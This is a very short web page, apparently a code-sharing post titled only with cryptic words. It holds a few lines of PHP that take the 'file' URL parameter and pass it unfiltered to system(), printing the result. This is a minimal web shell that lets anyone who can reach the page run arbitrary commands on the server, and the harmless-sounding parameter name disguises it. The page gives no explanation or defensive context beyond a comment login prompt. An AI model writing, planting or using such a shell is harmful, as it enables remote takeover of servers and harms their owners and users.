secsh

qzdz

<?php
 
$file = $_GET['file'];
echo "<pre>";
system ("$file");
echo "</pre>";
 
?>

Comments

You need Log in or Create an account to join the conversation.